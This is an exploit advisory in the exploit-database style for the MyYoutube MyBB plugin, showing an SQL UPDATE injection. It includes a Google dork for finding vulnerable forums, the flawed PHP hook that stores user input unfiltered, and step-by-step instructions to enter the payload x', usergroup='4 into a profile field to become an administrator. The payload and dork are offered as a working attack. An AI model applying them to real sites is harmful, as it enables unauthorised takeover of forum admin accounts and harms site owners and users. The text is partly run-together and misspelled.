# Exploit Title: MyYoutube MyBB plugin SQL UPDATE injection.# Google Dork: inurl:member.php intext:"Youtube Video" intitle:"Profile of"# Date: 12.10.2012# Exploit Author: Zixem# Vendor Homepage: http://www.mybb-es.com# Software Link: http://mods.mybb.com/view/myyoutube# Version: 1.0# Tested on: Linux.
MyYoutube plugin suffers from POST SQL UPDATE injection.
The vulnerabillity exist within youtube.php :<?php
$plugins->add_hook("datahandler_user_update","youtube_update");/*Line 8*/
function youtube_update($ytb)/*Line 128*/{global $mybb;if(isset($mybb->input['ytb'])){
$ytb->user_update_data['ytb']= $mybb->input['ytb'];}}
?>
Insturctions:(1) Go to usercp.php?action=profile
(2) http://i.imgur.com/gPYdq.png
Enter this in the youtube ID field(just like in the picture): x', usergroup='4(3) Press on the update button.(4) You're an admin now :3
If you're still not admins, just play with the number...on my pentest forum, the admins usergroup number is4.
PoC:
before: http://i.imgur.com/aPFsz.png
While exploiting: http://i.imgur.com/gPYdq.png
Result: http://i.imgur.com/4ezpF.png
http://twitter.com/z1xem
-Zixem